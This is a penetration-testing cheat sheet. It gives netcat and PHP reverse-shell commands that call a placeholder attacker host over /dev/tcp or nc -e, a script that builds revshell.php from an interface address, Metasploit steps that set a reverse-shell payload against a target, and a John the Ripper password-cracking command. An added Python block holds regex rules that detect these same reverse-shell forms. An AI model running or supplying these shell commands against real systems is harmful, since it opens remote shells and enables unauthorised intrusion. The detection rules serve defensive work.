Exploitation

RevShell

You can use the following website to craft a reverse shell as you wish

nc Revshell

nc listener on attacker machine
nc -nlvp 4444
nc on Linux target
nc $attacker_ip 4444 -e /bin/bash
nc on Windows machine
nc $attacker_ip 4444 -e cmd.exe

PHP Revshell

PHP one-liner (ATTACKING_IP is a placeholder for the listener address)
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/ATTACKING_IP/4444 0>&1'");?>
Automatically create the PHP revshell from the IPv4 address of an interface of your choice
interface="tun0"; echo "<?php exec(\"/bin/bash -c 'bash -i >& /dev/tcp/$(ip -o -4 addr show $interface | awk '{print $4}' | cut -d/ -f1)/4444 0>&1'\");?>" > /home/parallels/Documents/revshell.php
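
Detection check for the reverse-shell forms listed above (nc with -e, bash over /dev/tcp, PHP exec wrapper). This is an added example, not part of the original page; the rule names, the sample events and the 203.0.113.5 address are constructed for illustration.

```python
import re

# Signatures for the reverse-shell forms listed on this page (added example).
RULES = {
    # netcat started with -e/--exec handing a shell to the remote side
    "nc_exec": re.compile(
        r"\b(?:nc|ncat|netcat)(?:\.exe)?\b.*\s(?:-e|--exec)\s+\S*(?:sh|cmd\.exe|powershell)",
        re.I),
    # bash pseudo-device redirect: /dev/tcp/<host>/<port>
    "bash_dev_tcp": re.compile(r"/dev/(?:tcp|udp)/[^/\s]+/\d+"),
    # PHP file body that shells out to one of the forms above
    "php_exec_shell": re.compile(
        r"<\?php.*\b(?:exec|system|passthru|shell_exec)\s*\(.*(?:/dev/tcp/|\bnc\b)",
        re.I | re.S),
}

def match_rules(text):
    """Return the sorted names of all rules that fire on one command line or file body."""
    return sorted(name for name, rx in RULES.items() if rx.search(text))

def scan(events):
    """events: iterable of (source, text). Return [(source, [rule, ...])] for hits only."""
    hits = []
    for source, text in events:
        fired = match_rules(text)
        if fired:
            hits.append((source, fired))
    return hits

# Constructed sample data: process command lines as an EDR or auditd execve
# record would report them, plus one uploaded file body. 203.0.113.5 is a
# documentation address (RFC 5737).
SAMPLE_EVENTS = [
    ("pid 4121", "nc 203.0.113.5 4444 -e /bin/bash"),
    ("pid 4122", "nc.exe 203.0.113.5 4444 -e cmd.exe"),
    ("pid 4130", "/bin/bash -c bash -i >& /dev/tcp/203.0.113.5/4444 0>&1"),
    ("upload revshell.php",
     "<?php exec(\"/bin/bash -c 'bash -i >& /dev/tcp/203.0.113.5/4444 0>&1'\");?>"),
    ("pid 4200", "nc -zv 10.0.0.8 22"),             # port check, no -e: benign
    ("pid 4201", "bash -c 'ls /dev/ > /tmp/out'"),  # no /dev/tcp path: benign
]

if __name__ == "__main__":
    for source, fired in scan(SAMPLE_EVENTS):
        print(f"{source}: {', '.join(fired)}")
```

The nc rule only matches -e or --exec as a separate flag; combined short flags and renamed binaries need process-ancestry or network telemetry instead.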

Metasploit

sudo msfdb init
sudo systemctl enable postgresql
sudo msfconsole    # Launch Metasploit
workspace -a $workspace 
db_nmap -A $ip
search type:auxiliary ssh
workspace -a exploits
search Apache $version 
use $number
show options
set payload payload/linux/x64/shell_reverse_tcp
show options
set SSL False
set RPORT 80
set RHOSTS $target_ip
run

Password cracking

John the Ripper
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt